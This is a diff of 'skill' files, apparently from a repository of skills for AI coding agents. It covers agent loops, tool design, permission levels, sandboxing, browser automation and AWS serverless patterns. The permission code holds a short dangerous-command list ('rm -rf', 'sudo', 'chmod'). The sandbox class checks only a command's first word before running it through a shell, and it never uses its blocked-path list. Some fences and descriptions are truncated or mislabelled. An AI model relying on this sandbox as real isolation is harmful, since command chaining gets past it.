│ │ ┌──────────┐ │ │
|
||||
│ └─────────│ Observe │◀─────────┘ │
|
||||
│ │ (Result) │ │
|
||||
│ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
```python
|
||||
class AgentLoop:
|
||||
def __init__(self, llm, tools, max_iterations=50):
|
||||
self.llm = llm
|
||||
self.tools = {t.name: t for t in tools}
|
||||
self.max_iterations = max_iterations
|
||||
self.history = []
|
||||
|
||||
def run(self, task: str) -> str:
|
||||
self.history.append({"role": "user", "content": task})
|
||||
|
||||
for i in range(self.max_iterations):
|
||||
# Think: Get LLM response with tool options
|
||||
response = self.llm.chat(
|
||||
messages=self.history,
|
||||
tools=self._format_tools(),
|
||||
tool_choice="auto"
|
||||
)
|
||||
|
||||
# Decide: Check if agent wants to use a tool
|
||||
if response.tool_calls:
|
||||
for tool_call in response.tool_calls:
|
||||
# Act: Execute the tool
|
||||
result = self._execute_tool(tool_call)
|
||||
|
||||
# Observe: Add result to history
|
||||
self.history.append({
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call.id,
|
||||
"content": str(result)
|
||||
})
|
||||
else:
|
||||
# No more tool calls = task complete
|
||||
return response.content
|
||||
|
||||
return "Max iterations reached"
|
||||
|
||||
def _execute_tool(self, tool_call) -> Any:
|
||||
tool = self.tools[tool_call.name]
|
||||
args = json.loads(tool_call.arguments)
|
||||
return tool.execute(**args)
|
||||
```
|
||||
|
||||
### 1.2 Multi-Model Architecture
|
||||
|
||||
```python
|
||||
class MultiModelAgent:
|
||||
"""
|
||||
Use different models for different purposes:
|
||||
- Fast model for planning
|
||||
- Powerful model for complex reasoning
|
||||
- Specialized model for code generation
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.models = {
|
||||
"fast": "gpt-3.5-turbo", # Quick decisions
|
||||
"smart": "gpt-4-turbo", # Complex reasoning
|
||||
"code": "claude-3-sonnet", # Code generation
|
||||
}
|
||||
|
||||
def select_model(self, task_type: str) -> str:
|
||||
if task_type == "planning":
|
||||
return self.models["fast"]
|
||||
elif task_type == "analysis":
|
||||
return self.models["smart"]
|
||||
elif task_type == "code":
|
||||
return self.models["code"]
|
||||
return self.models["smart"]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Tool Design Patterns
|
||||
|
||||
### 2.1 Tool Schema
|
||||
|
||||
```python
|
||||
class Tool:
|
||||
"""Base class for agent tools"""
|
||||
|
||||
@property
|
||||
def schema(self) -> dict:
|
||||
"""JSON Schema for the tool"""
|
||||
return {
|
||||
"name": self.name,
|
||||
"description": self.description,
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": self._get_parameters(),
|
||||
"required": self._get_required()
|
||||
}
|
||||
}
|
||||
|
||||
def execute(self, **kwargs) -> ToolResult:
|
||||
"""Execute the tool and return result"""
|
||||
raise NotImplementedError
|
||||
|
||||
class ReadFileTool(Tool):
|
||||
name = "read_file"
|
||||
description = "Read the contents of a file from the filesystem"
|
||||
|
||||
def _get_parameters(self):
|
||||
return {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Absolute path to the file"
|
||||
},
|
||||
"start_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to start reading from (1-indexed)"
|
||||
},
|
||||
"end_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to stop reading at (inclusive)"
|
||||
}
|
||||
}
|
||||
|
||||
def _get_required(self):
|
||||
return ["path"]
|
||||
|
||||
def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
|
||||
try:
|
||||
with open(path, 'r') as f:
|
||||
lines = f.readlines()
|
||||
|
||||
if start_line and end_line:
|
||||
lines = lines[start_line-1:end_line]
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output="".join(lines)
|
||||
)
|
||||
except FileNotFoundError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"File not found: {path}"
|
||||
)
|
||||
```
|
||||
|
||||
### 2.2 Essential Agent Tools
|
||||
|
||||
```python
|
||||
CODING_AGENT_TOOLS = {
|
||||
# File operations
|
||||
"read_file": "Read file contents",
|
||||
"write_file": "Create or overwrite a file",
|
||||
"edit_file": "Make targeted edits to a file",
|
||||
"list_directory": "List files and folders",
|
||||
"search_files": "Search for files by pattern",
|
||||
|
||||
# Code understanding
|
||||
"search_code": "Search for code patterns (grep)",
|
||||
"get_definition": "Find function/class definition",
|
||||
"get_references": "Find all references to a symbol",
|
||||
|
||||
# Terminal
|
||||
"run_command": "Execute a shell command",
|
||||
"read_output": "Read command output",
|
||||
"send_input": "Send input to running command",
|
||||
|
||||
# Browser (optional)
|
||||
"open_browser": "Open URL in browser",
|
||||
"click_element": "Click on page element",
|
||||
"type_text": "Type text into input",
|
||||
"screenshot": "Capture screenshot",
|
||||
|
||||
# Context
|
||||
"ask_user": "Ask the user a question",
|
||||
"search_web": "Search the web for information"
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 Edit Tool Design
|
||||
|
||||
```python
|
||||
class EditFileTool(Tool):
|
||||
"""
|
||||
Precise file editing with conflict detection.
|
||||
Uses search/replace pattern for reliable edits.
|
||||
"""
|
||||
|
||||
name = "edit_file"
|
||||
description = "Edit a file by replacing specific content"
|
||||
|
||||
def execute(
|
||||
self,
|
||||
path: str,
|
||||
search: str,
|
||||
replace: str,
|
||||
expected_occurrences: int = 1
|
||||
) -> ToolResult:
|
||||
"""
|
||||
Args:
|
||||
path: File to edit
|
||||
search: Exact text to find (must match exactly, including whitespace)
|
||||
replace: Text to replace with
|
||||
expected_occurrences: How many times search should appear (validation)
|
||||
"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
# Validate
|
||||
actual_occurrences = content.count(search)
|
||||
if actual_occurrences != expected_occurrences:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
|
||||
)
|
||||
|
||||
if actual_occurrences == 0:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="Search text not found in file"
|
||||
)
|
||||
|
||||
# Apply edit
|
||||
new_content = content.replace(search, replace)
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(new_content)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Replaced {actual_occurrences} occurrence(s)"
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Permission & Safety Patterns
|
||||
|
||||
### 3.1 Permission Levels
|
||||
|
||||
```python
|
||||
class PermissionLevel(Enum):
|
||||
# Fully automatic - no user approval needed
|
||||
AUTO = "auto"
|
||||
|
||||
# Ask once per session
|
||||
ASK_ONCE = "ask_once"
|
||||
|
||||
# Ask every time
|
||||
ASK_EACH = "ask_each"
|
||||
|
||||
# Never allow
|
||||
NEVER = "never"
|
||||
|
||||
PERMISSION_CONFIG = {
|
||||
# Low risk - can auto-approve
|
||||
"read_file": PermissionLevel.AUTO,
|
||||
"list_directory": PermissionLevel.AUTO,
|
||||
"search_code": PermissionLevel.AUTO,
|
||||
|
||||
# Medium risk - ask once
|
||||
"write_file": PermissionLevel.ASK_ONCE,
|
||||
"edit_file": PermissionLevel.ASK_ONCE,
|
||||
|
||||
# High risk - ask each time
|
||||
"run_command": PermissionLevel.ASK_EACH,
|
||||
"delete_file": PermissionLevel.ASK_EACH,
|
||||
|
||||
# Dangerous - never auto-approve
|
||||
"sudo_command": PermissionLevel.NEVER,
|
||||
"format_disk": PermissionLevel.NEVER
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 Approval UI Pattern
|
||||
|
||||
```python
|
||||
class ApprovalManager:
|
||||
def __init__(self, ui, config):
|
||||
self.ui = ui
|
||||
self.config = config
|
||||
self.session_approvals = {}
|
||||
|
||||
def request_approval(self, tool_name: str, args: dict) -> bool:
|
||||
level = self.config.get(tool_name, PermissionLevel.ASK_EACH)
|
||||
|
||||
if level == PermissionLevel.AUTO:
|
||||
return True
|
||||
|
||||
if level == PermissionLevel.NEVER:
|
||||
self.ui.show_error(f"Tool '{tool_name}' is not allowed")
|
||||
return False
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
if tool_name in self.session_approvals:
|
||||
return self.session_approvals[tool_name]
|
||||
|
||||
# Show approval dialog
|
||||
approved = self.ui.show_approval_dialog(
|
||||
tool=tool_name,
|
||||
args=args,
|
||||
risk_level=self._assess_risk(tool_name, args)
|
||||
)
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
self.session_approvals[tool_name] = approved
|
||||
|
||||
return approved
|
||||
|
||||
def _assess_risk(self, tool_name: str, args: dict) -> str:
|
||||
"""Analyze specific call for risk level"""
|
||||
if tool_name == "run_command":
|
||||
cmd = args.get("command", "")
|
||||
if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
|
||||
return "HIGH"
|
||||
return "MEDIUM"
|
||||
```
|
||||
|
||||
### 3.3 Sandboxing
|
||||
|
||||
```python
|
||||
class SandboxedExecution:
|
||||
"""
|
||||
Execute code/commands in isolated environment
|
||||
"""
|
||||
|
||||
def __init__(self, workspace_dir: str):
|
||||
self.workspace = workspace_dir
|
||||
self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
|
||||
self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]
|
||||
|
||||
def validate_path(self, path: str) -> bool:
|
||||
"""Ensure path is within workspace"""
|
||||
real_path = os.path.realpath(path)
|
||||
workspace_real = os.path.realpath(self.workspace)
|
||||
return real_path.startswith(workspace_real)
|
||||
|
||||
def validate_command(self, command: str) -> bool:
|
||||
"""Check if command is allowed"""
|
||||
cmd_parts = shlex.split(command)
|
||||
if not cmd_parts:
|
||||
return False
|
||||
|
||||
base_cmd = cmd_parts[0]
|
||||
return base_cmd in self.allowed_commands
|
||||
|
||||
def execute_sandboxed(self, command: str) -> ToolResult:
|
||||
if not self.validate_command(command):
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Command not allowed: {command}"
|
||||
)
|
||||
|
||||
# Execute in isolated environment
|
||||
result = subprocess.run(
|
||||
command,
|
||||
shell=True,
|
||||
cwd=self.workspace,
|
||||
capture_output=True,
|
||||
timeout=30,
|
||||
env={
|
||||
**os.environ,
|
||||
"HOME": self.workspace, # Isolate home directory
|
||||
}
|
||||
)
|
||||
|
||||
return ToolResult(
|
||||
success=result.returncode == 0,
|
||||
output=result.stdout.decode(),
|
||||
error=result.stderr.decode() if result.returncode != 0 else None
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Browser Automation
|
||||
|
||||
### 4.1 Browser Tool Pattern
|
||||
|
||||
```python
|
||||
class BrowserTool:
|
||||
"""
|
||||
Browser automation for agents using Playwright/Puppeteer.
|
||||
Enables visual debugging and web testing.
|
||||
"""
|
||||
|
||||
def __init__(self, headless: bool = True):
|
||||
self.browser = None
|
||||
self.page = None
|
||||
self.headless = headless
|
||||
|
||||
async def open_url(self, url: str) -> ToolResult:
|
||||
"""Navigate to URL and return page info"""
|
||||
if not self.browser:
|
||||
self.browser = await playwright.chromium.launch(headless=self.headless)
|
||||
self.page = await self.browser.new_page()
|
||||
|
||||
await self.page.goto(url)
|
||||
|
||||
# Capture state
|
||||
screenshot = await self.page.screenshot(type='png')
|
||||
title = await self.page.title()
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Loaded: {title}",
|
||||
metadata={
|
||||
"screenshot": base64.b64encode(screenshot).decode(),
|
||||
"url": self.page.url
|
||||
}
|
||||
)
|
||||
|
||||
async def click(self, selector: str) -> ToolResult:
|
||||
"""Click on an element"""
|
||||
try:
|
||||
await self.page.click(selector, timeout=5000)
|
||||
await self.page.wait_for_load_state("networkidle")
|
||||
|
||||
screenshot = await self.page.screenshot()
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Clicked: {selector}",
|
||||
metadata={"screenshot": base64.b64encode(screenshot).decode()}
|
||||
)
|
||||
except TimeoutError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Element not found: {selector}"
|
||||
)
|
||||
|
||||
async def type_text(self, selector: str, text: str) -> ToolResult:
|
||||
"""Type text into an input"""
|
||||
await self.page.fill(selector, text)
|
||||
return ToolResult(success=True, output=f"Typed into {selector}")
|
||||
|
||||
async def get_page_content(self) -> ToolResult:
|
||||
"""Get accessible text content of the page"""
|
||||
content = await self.page.evaluate("""
|
||||
() => {
|
||||
// Get visible text
|
||||
const walker = document.createTreeWalker(
|
||||
document.body,
|
||||
NodeFilter.SHOW_TEXT,
|
||||
null,
|
||||
false
|
||||
);
|
||||
|
||||
let text = '';
|
||||
while (walker.nextNode()) {
|
||||
const node = walker.currentNode;
|
||||
if (node.textContent.trim()) {
|
||||
text += node.textContent.trim() + '\\n';
|
||||
}
|
||||
}
|
||||
return text;
|
||||
}
|
||||
""")
|
||||
return ToolResult(success=True, output=content)
|
||||
```
|
||||
|
||||
### 4.2 Visual Agent Pattern
|
||||
|
||||
```python
|
||||
class VisualAgent:
|
||||
"""
|
||||
Agent that uses screenshots to understand web pages.
|
||||
Can identify elements visually without selectors.
|
||||
"""
|
||||
|
||||
def __init__(self, llm, browser):
|
||||
self.llm = llm
|
||||
self.browser = browser
|
||||
|
||||
async def describe_page(self) -> str:
|
||||
"""Use vision model to describe current page"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
return response.content
|
||||
|
||||
async def find_and_click(self, description: str) -> ToolResult:
|
||||
"""Find element by visual description and click it"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
# Ask vision model to find element
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": f"""
|
||||
Find the element matching: "{description}"
|
||||
Return the approximate coordinates as JSON: {{"x": number, "y": number}}
|
||||
"""
|
||||
},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
coords = json.loads(response.content)
|
||||
await self.browser.page.mouse.click(coords["x"], coords["y"])
|
||||
|
||||
return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Context Management
|
||||
|
||||
### 5.1 Context Injection Patterns
|
||||
|
||||
````python
|
||||
class ContextManager:
|
||||
"""
|
||||
Manage context provided to the agent.
|
||||
Inspired by Cline's @-mention patterns.
|
||||
"""
|
||||
|
||||
def __init__(self, workspace: str):
|
||||
self.workspace = workspace
|
||||
self.context = []
|
||||
|
||||
def add_file(self, path: str) -> None:
|
||||
"""@file - Add file contents to context"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
self.context.append({
|
||||
"type": "file",
|
||||
"path": path,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_folder(self, path: str, max_files: int = 20) -> None:
|
||||
"""@folder - Add all files in folder"""
|
||||
for root, dirs, files in os.walk(path):
|
||||
for file in files[:max_files]:
|
||||
file_path = os.path.join(root, file)
|
||||
self.add_file(file_path)
|
||||
|
||||
def add_url(self, url: str) -> None:
|
||||
"""@url - Fetch and add URL content"""
|
||||
response = requests.get(url)
|
||||
content = html_to_markdown(response.text)
|
||||
|
||||
self.context.append({
|
||||
"type": "url",
|
||||
"url": url,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_problems(self, diagnostics: list) -> None:
|
||||
"""@problems - Add IDE diagnostics"""
|
||||
self.context.append({
|
||||
"type": "diagnostics",
|
||||
"problems": diagnostics
|
||||
})
|
||||
|
||||
def format_for_prompt(self) -> str:
|
||||
"""Format all context for LLM prompt"""
|
||||
parts = []
|
||||
for item in self.context:
|
||||
if item["type"] == "file":
|
||||
parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
|
||||
elif item["type"] == "url":
|
||||
parts.append(f"## URL: {item['url']}\n{item['content']}")
|
||||
elif item["type"] == "diagnostics":
|
||||
parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")
|
||||
|
||||
return "\n\n".join(parts)
|
||||
````
|
||||
|
||||
### 5.2 Checkpoint/Resume
|
||||
|
||||
```python
|
||||
class CheckpointManager:
|
||||
"""
|
||||
Save and restore agent state for long-running tasks.
|
||||
"""
|
||||
|
||||
def __init__(self, storage_dir: str):
|
||||
self.storage_dir = storage_dir
|
||||
os.makedirs(storage_dir, exist_ok=True)
|
||||
|
||||
def save_checkpoint(self, session_id: str, state: dict) -> str:
|
||||
"""Save current agent state"""
|
||||
checkpoint = {
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
"session_id": session_id,
|
||||
"history": state["history"],
|
||||
"context": state["context"],
|
||||
"workspace_state": self._capture_workspace(state["workspace"]),
|
||||
"metadata": state.get("metadata", {})
|
||||
}
|
||||
|
||||
path = os.path.join(self.storage_dir, f"{session_id}.json")
|
||||
with open(path, 'w') as f:
|
||||
json.dump(checkpoint, f, indent=2)
|
||||
|
||||
return path
|
||||
|
||||
def restore_checkpoint(self, checkpoint_path: str) -> dict:
|
||||
"""Restore agent state from checkpoint"""
|
||||
with open(checkpoint_path, 'r') as f:
|
||||
checkpoint = json.load(f)
|
||||
|
||||
return {
|
||||
"history": checkpoint["history"],
|
||||
"context": checkpoint["context"],
|
||||
"workspace": self._restore_workspace(checkpoint["workspace_state"]),
|
||||
"metadata": checkpoint["metadata"]
|
||||
}
|
||||
|
||||
def _capture_workspace(self, workspace: str) -> dict:
|
||||
"""Capture relevant workspace state"""
|
||||
# Git status, file hashes, etc.
|
||||
return {
|
||||
"git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
|
||||
"git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. MCP (Model Context Protocol) Integration
|
||||
|
||||
### 6.1 MCP Server Pattern
|
||||
|
||||
```python
|
||||
from mcp import Server, Tool
|
||||
|
||||
class MCPAgent:
|
||||
"""
|
||||
Agent that can dynamically discover and use MCP tools.
|
||||
'Add a tool that...' pattern from Cline.
|
||||
"""
|
||||
|
||||
def __init__(self, llm):
|
||||
self.llm = llm
|
||||
self.mcp_servers = {}
|
||||
self.available_tools = {}
|
||||
|
||||
def connect_server(self, name: str, config: dict) -> None:
|
||||
"""Connect to an MCP server"""
|
||||
server = Server(config)
|
||||
self.mcp_servers[name] = server
|
||||
|
||||
# Discover tools
|
||||
tools = server.list_tools()
|
||||
for tool in tools:
|
||||
self.available_tools[tool.name] = {
|
||||
"server": name,
|
||||
"schema": tool.schema
|
||||
}
|
||||
|
||||
async def create_tool(self, description: str) -> str:
|
||||
"""
|
||||
Create a new MCP server based on user description.
|
||||
'Add a tool that fetches Jira tickets'
|
||||
"""
|
||||
# Generate MCP server code
|
||||
code = self.llm.generate(f"""
|
||||
Create a Python MCP server with a tool that does:
|
||||
{description}
|
||||
|
||||
Use the FastMCP framework. Include proper error handling.
|
||||
Return only the Python code.
|
||||
""")
|
||||
|
||||
# Save and install
|
||||
server_name = self._extract_name(description)
|
||||
path = f"./mcp_servers/{server_name}/server.py"
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(code)
|
||||
|
||||
# Hot-reload
|
||||
self.connect_server(server_name, {"path": path})
|
||||
|
||||
return f"Created tool: {server_name}"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices Checklist
|
||||
|
||||
### Agent Design
|
||||
|
||||
- [ ] Clear task decomposition
|
||||
- [ ] Appropriate tool granularity
|
||||
- [ ] Error handling at each step
|
||||
- [ ] Progress visibility to user
|
||||
|
||||
### Safety
|
||||
|
||||
- [ ] Permission system implemented
|
||||
- [ ] Dangerous operations blocked
|
||||
- [ ] Sandbox for untrusted code
|
||||
- [ ] Audit logging enabled
|
||||
|
||||
### UX
|
||||
|
||||
- [ ] Approval UI is clear
|
||||
- [ ] Progress updates provided
|
||||
- [ ] Undo/rollback available
|
||||
- [ ] Explanation of actions
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Cline](https://github.com/cline/cline)
|
||||
- [OpenAI Codex](https://github.com/openai/codex)
|
||||
- [Model Context Protocol](https://modelcontextprotocol.io/)
|
||||
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
|
||||
68
skills/autonomous-agents/SKILL.md
Normal file
68
skills/autonomous-agents/SKILL.md
Normal file
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: autonomous-agents
|
||||
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% b"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Autonomous Agents
|
||||
|
||||
You are an agent architect who has learned the hard lessons of autonomous AI.
|
||||
You've seen the gap between impressive demos and production disasters. You know
|
||||
that a 95% success rate per step means only 60% by step 10.
|
||||
|
||||
Your core insight: Autonomy is earned, not granted. Start with heavily
|
||||
constrained agents that do one thing reliably. Add autonomy only as you prove
|
||||
reliability. The best agents look less impressive but work consistently.
|
||||
|
||||
You push for guardrails before capabilities, logging befor
|
||||
|
||||
## Capabilities
|
||||
|
||||
- autonomous-agents
|
||||
- agent-loops
|
||||
- goal-decomposition
|
||||
- self-correction
|
||||
- reflection-patterns
|
||||
- react-pattern
|
||||
- plan-execute
|
||||
- agent-reliability
|
||||
- agent-guardrails
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Agent Loop
|
||||
|
||||
Alternating reasoning and action steps
|
||||
|
||||
### Plan-Execute Pattern
|
||||
|
||||
Separate planning phase from execution
|
||||
|
||||
### Reflection Pattern
|
||||
|
||||
Self-evaluation and iterative improvement
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unbounded Autonomy
|
||||
|
||||
### ❌ Trusting Agent Outputs
|
||||
|
||||
### ❌ General-Purpose Autonomy
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Reduce step count |
|
||||
| Issue | critical | ## Set hard cost limits |
|
||||
| Issue | critical | ## Test at scale before production |
|
||||
| Issue | high | ## Validate against ground truth |
|
||||
| Issue | high | ## Build robust API clients |
|
||||
| Issue | high | ## Least privilege principle |
|
||||
| Issue | medium | ## Track context usage |
|
||||
| Issue | medium | ## Structured logging |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
|
||||
323
skills/aws-serverless/SKILL.md
Normal file
323
skills/aws-serverless/SKILL.md
Normal file
@@ -0,0 +1,323 @@
|
||||
---
|
||||
name: aws-serverless
|
||||
description: "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start optimization."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AWS Serverless
|
||||
|
||||
## Patterns
|
||||
|
||||
### Lambda Handler Pattern
|
||||
|
||||
Proper Lambda function structure with error handling
|
||||
|
||||
**When to use**: ['Any Lambda function implementation', 'API handlers, event processors, scheduled tasks']
|
||||
|
||||
```python
|
||||
```javascript
|
||||
// Node.js Lambda Handler
|
||||
// handler.js
|
||||
|
||||
// Initialize outside handler (reused across invocations)
|
||||
const { DynamoDBClient } = require('@aws-sdk/client-dynamodb');
|
||||
const { DynamoDBDocumentClient, GetCommand } = require('@aws-sdk/lib-dynamodb');
|
||||
|
||||
const client = new DynamoDBClient({});
|
||||
const docClient = DynamoDBDocumentClient.from(client);
|
||||
|
||||
// Handler function
|
||||
exports.handler = async (event, context) => {
|
||||
// Optional: Don't wait for event loop to clear (Node.js)
|
||||
context.callbackWaitsForEmptyEventLoop = false;
|
||||
|
||||
try {
|
||||
// Parse input based on event source
|
||||
const body = typeof event.body === 'string'
|
||||
? JSON.parse(event.body)
|
||||
: event.body;
|
||||
|
||||
// Business logic
|
||||
const result = await processRequest(body);
|
||||
|
||||
// Return API Gateway compatible response
|
||||
return {
|
||||
statusCode: 200,
|
||||
headers: {
|
||||
'Content-Type': 'application/json',
|
||||
'Access-Control-Allow-Origin': '*'
|
||||
},
|
||||
body: JSON.stringify(result)
|
||||
};
|
||||
} catch (error) {
|
||||
console.error('Error:', JSON.stringify({
|
||||
error: error.message,
|
||||
stack: error.stack,
|
||||
requestId: context.awsRequestId
|
||||
}));
|
||||
|
||||
return {
|
||||
statusCode: error.statusCode || 500,
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
error: error.message || 'Internal server error'
|
||||
})
|
||||
};
|
||||
}
|
||||
};
|
||||
|
||||
async function processRequest(data) {
|
||||
// Your business logic here
|
||||
const result = await docClient.send(new GetCommand({
|
||||
TableName: process.env.TABLE_NAME,
|
||||
Key: { id: data.id }
|
||||
}));
|
||||
return result.Item;
|
||||
}
|
||||
```
|
||||
|
||||
```python
|
||||
# Python Lambda Handler
|
||||
# handler.py
|
||||
|
||||
import json
|
||||
import os
|
||||
import logging
|
||||
import boto3
|
||||
from botocore.exceptions import ClientError
|
||||
|
||||
# Initialize outside handler (reused across invocations)
|
||||
logger = logging.getLogger()
|
||||
logger.setLevel(logging.INFO)
|
||||
|
||||
dynamodb = boto3.resource('dynamodb')
|
||||
table = dynamodb.Table(os.environ['TABLE_NAME'])
|
||||
|
||||
def handler(event, context):
|
||||
try:
|
||||
# Parse i
|
||||
```
|
||||
|
||||
### API Gateway Integration Pattern
|
||||
|
||||
REST API and HTTP API integration with Lambda
|
||||
|
||||
**When to use**: ['Building REST APIs backed by Lambda', 'Need HTTP endpoints for functions']
|
||||
|
||||
```javascript
|
||||
```yaml
|
||||
# template.yaml (SAM)
|
||||
AWSTemplateFormatVersion: '2010-09-09'
|
||||
Transform: AWS::Serverless-2016-10-31
|
||||
|
||||
Globals:
|
||||
Function:
|
||||
Runtime: nodejs20.x
|
||||
Timeout: 30
|
||||
MemorySize: 256
|
||||
Environment:
|
||||
Variables:
|
||||
TABLE_NAME: !Ref ItemsTable
|
||||
|
||||
Resources:
|
||||
# HTTP API (recommended for simple use cases)
|
||||
HttpApi:
|
||||
Type: AWS::Serverless::HttpApi
|
||||
Properties:
|
||||
StageName: prod
|
||||
CorsConfiguration:
|
||||
AllowOrigins:
|
||||
- "*"
|
||||
AllowMethods:
|
||||
- GET
|
||||
- POST
|
||||
- DELETE
|
||||
AllowHeaders:
|
||||
- "*"
|
||||
|
||||
# Lambda Functions
|
||||
GetItemFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/get.handler
|
||||
Events:
|
||||
GetItem:
|
||||
Type: HttpApi
|
||||
Properties:
|
||||
ApiId: !Ref HttpApi
|
||||
Path: /items/{id}
|
||||
Method: GET
|
||||
Policies:
|
||||
- DynamoDBReadPolicy:
|
||||
TableName: !Ref ItemsTable
|
||||
|
||||
CreateItemFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/create.handler
|
||||
Events:
|
||||
CreateItem:
|
||||
Type: HttpApi
|
||||
Properties:
|
||||
ApiId: !Ref HttpApi
|
||||
Path: /items
|
||||
Method: POST
|
||||
Policies:
|
||||
- DynamoDBCrudPolicy:
|
||||
TableName: !Ref ItemsTable
|
||||
|
||||
# DynamoDB Table
|
||||
ItemsTable:
|
||||
Type: AWS::DynamoDB::Table
|
||||
Properties:
|
||||
AttributeDefinitions:
|
||||
- AttributeName: id
|
||||
AttributeType: S
|
||||
KeySchema:
|
||||
- AttributeName: id
|
||||
KeyType: HASH
|
||||
BillingMode: PAY_PER_REQUEST
|
||||
|
||||
Outputs:
|
||||
ApiUrl:
|
||||
Value: !Sub "https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod"
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/handlers/get.js
|
||||
const { getItem } = require('../lib/dynamodb');
|
||||
|
||||
exports.handler = async (event) => {
|
||||
const id = event.pathParameters?.id;
|
||||
|
||||
if (!id) {
|
||||
return {
|
||||
statusCode: 400,
|
||||
body: JSON.stringify({ error: 'Missing id parameter' })
|
||||
};
|
||||
}
|
||||
|
||||
const item =
|
||||
```
|
||||
|
||||
### Event-Driven SQS Pattern
|
||||
|
||||
Lambda triggered by SQS for reliable async processing
|
||||
|
||||
**When to use**: ['Decoupled, asynchronous processing', 'Need retry logic and DLQ', 'Processing messages in batches']
|
||||
|
||||
```python
|
||||
```yaml
|
||||
# template.yaml
|
||||
Resources:
|
||||
ProcessorFunction:
|
||||
Type: AWS::Serverless::Function
|
||||
Properties:
|
||||
Handler: src/handlers/processor.handler
|
||||
Events:
|
||||
SQSEvent:
|
||||
Type: SQS
|
||||
Properties:
|
||||
Queue: !GetAtt ProcessingQueue.Arn
|
||||
BatchSize: 10
|
||||
FunctionResponseTypes:
|
||||
- ReportBatchItemFailures # Partial batch failure handling
|
||||
|
||||
ProcessingQueue:
|
||||
Type: AWS::SQS::Queue
|
||||
Properties:
|
||||
VisibilityTimeout: 180 # 6x Lambda timeout
|
||||
RedrivePolicy:
|
||||
